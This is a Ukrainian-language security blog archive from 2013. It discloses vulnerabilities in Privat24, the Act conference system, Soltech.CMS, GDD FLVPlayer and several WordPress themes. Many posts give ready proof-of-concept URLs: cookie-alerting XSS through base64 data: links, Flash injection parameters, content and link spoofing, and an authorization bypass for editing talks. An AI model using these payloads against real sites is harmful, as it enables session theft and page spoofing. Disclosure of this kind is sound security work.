Архів для категорії 'Уразливості'

Уразливості в Приват24 для Android та iOS

23:50 10.09.2013

У березні, 14.03.2013, я знайшов Brute Force та Insufficient Process Validation уразливості в Privat24 для Android та iOS (тоді в Android версії, а на початку вересня перевірив у iOS версії). Про це я згадував коли писав про іншу уразливість в Приват24.

Після мого повідомлення у березні ПриватБанк 2,5 місяці думав над цими уразливостями і відмовився їх виправляти. Після чого додав нову уразливість в Приват24, про яку я писав у вищезгаданому записі (причому вони погодилися з тим, що це уразливість й її потрібно виправити, але не зробили це до цих пір).

Детальна інформація про уразливості з’явиться пізніше.

Уразливості на act.yapc.eu

23:52 31.08.2013

09.07.2013

Сьогодні я знайшов Insufficient Authorization та інші уразливості на сайті http://act.yapc.eu. Про що найближчим часом сповіщу адміністрацію сайта.

Мене зацікавила конференція “Future Perl”, що буде проводитися у Києві у серпні. Й відвідавши сайт в черговий раз, що одразу видався мені дірявим, я швидко знайшов уразливості. Що дуже типово для сайтів конференцій - раніше я вже писав про багато дірявих сайтів конференцій (в тому числі на тему безпеки).

Детальна інформація про уразливості з’явиться пізніше.

31.08.2013

Insufficient Authorization (WASC-02):

http://act.yapc.eu/ye2013/edittalk?talk_id=1

Будь-який аутентифікований користувач може редагувати довільні доповіді (вказавши id). А також видаляти їх (через функцію редагування).

Дана уразливість вже виправлена.

Уразливості в плагінах для WordPress №115

23:54 30.08.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах HMS Testimonials, ThinkIT WP Contact Form та BackWPup. Для котрих з’явилися експлоіти. HMS Testimonials - це плагін для написання рецензій, ThinkIT WP Contact Form - це контактна форма, BackWPup - це плагін для створення бекапів.

  • WordPress HMS Testimonials 2.0.10 XSS / CSRF (деталі)
  • WordPress ThinkIT 0.1 CSRF / Cross Site Scripting (деталі)
  • WordPress BackWPup 3.0.12 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Уразливість в Act

23:56 29.08.2013

16.07.2013

У липні, 09.07.2013, я знайшов Insufficient Authorization уразливість (та багато інших) в Act. Що я знайшов на act.yapc.eu. Про що вже повідомив розробникам системи.

Детальна інформація про уразливість з’явиться пізніше.

29.08.2013

Insufficient Authorization (WASC-02):

http://site/edittalk?talk_id=1

Будь-який аутентифікований користувач може редагувати довільні доповіді (вказавши id). А також видаляти їх (через функцію редагування).

Уразливі всі версії Act. Розробники виправили дану уразливість 27.07.2013 (не відповівши мені й не подякувавши). В системі є ще багато уразливостей.

Добірка уразливостей

17:26 29.08.2013

В даній добірці уразливості в веб додатках:

XSS та CS уразливості в Soltech.CMS

23:58 27.08.2013

13.07.2013

У травні, 26.05.2013, я знайшов Cross-Site Scripting та Content Spoofing уразливості в Soltech.CMS. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливість в Soltech.CMS.

Детальна інформація про уразливість з’явиться пізніше. Спочатку повідомлю розробникам.

27.08.2013

В системі використовується вразлива версія JW Player 4.2.90.

Cross-Site Scripting (WASC-08):

http://site/plugins/flashplayer/player.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
http://site/plugins/flashplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg

Content Spoofing (WASC-12):

http://site/plugins/flashplayer/player.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/plugins/flashplayer/player.swf?file=1.flv&image=1.jpg
http://site/plugins/flashplayer/player.swf?config=1.xml
http://site/plugins/flashplayer/player.swf?abouttext=Player&aboutlink=http://websecurity.com.ua

Вразливі Soltech.CMS v 0.4 та попередні версії.

Добірка уразливостей

17:05 27.08.2013

В даній добірці уразливості в веб додатках:

  • Foscam <= 11.37.2.48 path traversal vulnerability (деталі)
  • Multiple Vulnerabilities in Kasseler CMS (деталі)
  • Air Drive Plus v2.4 iOS - Arbitrary File Upload Vulnerability (деталі)
  • Project Pier Web Vulnerabilities (деталі)
  • Privoxy Proxy Authentication Credential Exposure (деталі)

Уразливості в численних темах для WordPress з GDD FLVPlayer

23:52 24.08.2013

Сьогодні я виявив Content Spoofing, Cross-Site Scripting та Full path disclosure уразливості в темах для WordPress, що містять GDD FLVPlayer.

Раніше я писав про уразливості в GDD FLVPlayer. Це популярна флешка, що знаходиться на тисячах веб сайтів і яка використовується в багатьох веб додатках.

Цей плеєр міститься в багатьох темах (шаблонах) для WordPress. Серед них I Love It (про дірки в цій темі я вже писав), Megusta, Multipress, Lolzine, V1. Та існують інші уразливі теми для WordPress з gddflvplayer.swf.

XSS (через Flash Injection) (WASC-08):

I Love It:

http://site/wp-content/themes/iloveit/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/iloveit/flv/gddflvplayer.swf?splashscreen=xss.swf

Megusta:

http://site/wp-content/themes/megusta/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/megusta/flv/gddflvplayer.swf?splashscreen=xss.swf

Multipress:

http://site/wp-content/themes/multipress/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/multipress/flv/gddflvplayer.swf?splashscreen=xss.swf

Lolzine:

http://site/wp-content/themes/Lolzine/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/Lolzine/flv/gddflvplayer.swf?splashscreen=xss.swf

V1:

http://site/wp-content/themes/v1/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/v1/flv/gddflvplayer.swf?splashscreen=xss.swf

Full path disclosure (WASC-13):

Всі зазначені теми мають FPD уразливості в php-файлах (в index.php та інших), що типово для WP тем.

http://site/wp-content/themes/iloveit/

http://site/wp-content/themes/megusta/

http://site/wp-content/themes/multipress/

http://site/wp-content/themes/Lolzine/

http://site/wp-content/themes/v1/

В останній темі шлях може бути v1, v1.0, v1.3.5 та інші варіанти.

Наведені XSS та FPD уразливості, приклади 8 СS уразливостей дивитися у вищенаведеному записі. Вразливі веб додатки, що використовують GDD FLVPlayer v3.635 і попередні версії.

Вразливі всі версії наступних веб додатків: I Love It, Megusta, Multipress, Lolzine, V1.

Уразливості в численних веб додатках з GDD FLVPlayer

23:56 23.08.2013

Сьогодні я виявив Content Spoofing та Cross-Site Scripting уразливості в численних веб додатках з GDD FLVPlayer.

Раніше я писав про уразливості в GDD FLVPlayer. Це популярна флешка, що знаходиться на тисячах веб сайтів і яка використовується в багатьох веб додатках.

Зокрема в Order Master Pro, CMS Pask (Pixelwerk admin), gddflvplayer для MODx, Pixelfind Administrator, WHMCompleteSolution. Та в інших веб додатках. А також цей флеш відео та аудіо плеєр використовується на багатьох сайтах як самостійний веб додаток.

XSS (через Flash Injection) (WASC-08):

Order Master Pro:

http://site/op/video/gddflvplayer.swf?mylogo=xss.swf
http://site/op/video/gddflvplayer.swf?splashscreen=xss.swf

CMS Pask 3 (Pixelwerk admin):

http://site/gddflvplayer.swf?mylogo=xss.swf
http://site/gddflvplayer.swf?splashscreen=xss.swf

gddflvplayer для MODx:

http://site/assets/snippets/gddflvplayer/gddflvplayer.swf?mylogo=xss.swf
http://site/assets/snippets/gddflvplayer/gddflvplayer.swf?splashscreen=xss.swf

Pixelfind Administrator:

http://site/includes/flash/gddflvplayer.swf?mylogo=xss.swf
http://site/includes/flash/gddflvplayer.swf?splashscreen=xss.swf

WHMCompleteSolution:

http://site/player/gddflvplayer.swf?mylogo=xss.swf
http://site/player/gddflvplayer.swf?splashscreen=xss.swf

Наведені XSS уразливості, приклади 8 СS уразливостей дивитися у вищенаведеному записі. Вразливі веб додатки, що використовують GDD FLVPlayer v3.635 і попередні версії.

Вразливі наступні веб додатки: усі версії Order Master Pro, CMS Pask 3 (Pixelwerk admin v.3.3) і попередні версії, усі версії gddflvplayer для MODx, усі версії Pixelfind Administrator та усі версії WHMCompleteSolution.

CS та XSS уразливості в GDD FLVPlayer

17:24 23.08.2013

10.07.2013

У травні, 16.05.2013, я виявив Content Spoofing та Cross-Site Scripting уразливості в GDD FLVPlayer. Про що найближчим часом повідомлю розробникам веб додатку.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

23.08.2013

Content Spoofing (Flash Injection) (WASC-12):

http://site/gddflvplayer.swf?mylogo=http://site2/1.swf

http://site/gddflvplayer.swf?splashscreen=http://site2/1.swf

Можна включати флешки, в тому числі флешки з лінками.

XSS (через Flash Injection) (WASC-08):

http://site/gddflvplayer.swf?mylogo=xss.swf

http://site/gddflvplayer.swf?splashscreen=xss.swf

В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені.

Content Spoofing (Content Injection) (WASC-12):

http://site/gddflvplayer.swf?mylogo=http://site2/1.jpg

http://site/gddflvplayer.swf?splashscreen=http://site2/1.jpg

http://site/gddflvplayer.swf?advert=http://site2/1.flv

http://site/gddflvplayer.swf?vdo=http://site2/1.flv

Включення зображень і програш відео та аудіо (flv, mp4 та mp3 файлів) з зовнішніх сайтів.

Content Spoofing (Link Injection) (WASC-12):

http://site/gddflvplayer.swf?clickTAG=http://websecurity.com.ua

http://site/gddflvplayer.swf?vdo=http://site2/1.flv&endclipaction=http://websecurity.com.ua

Уразливі GDD FLVPlayer v3.635 та попередні версії.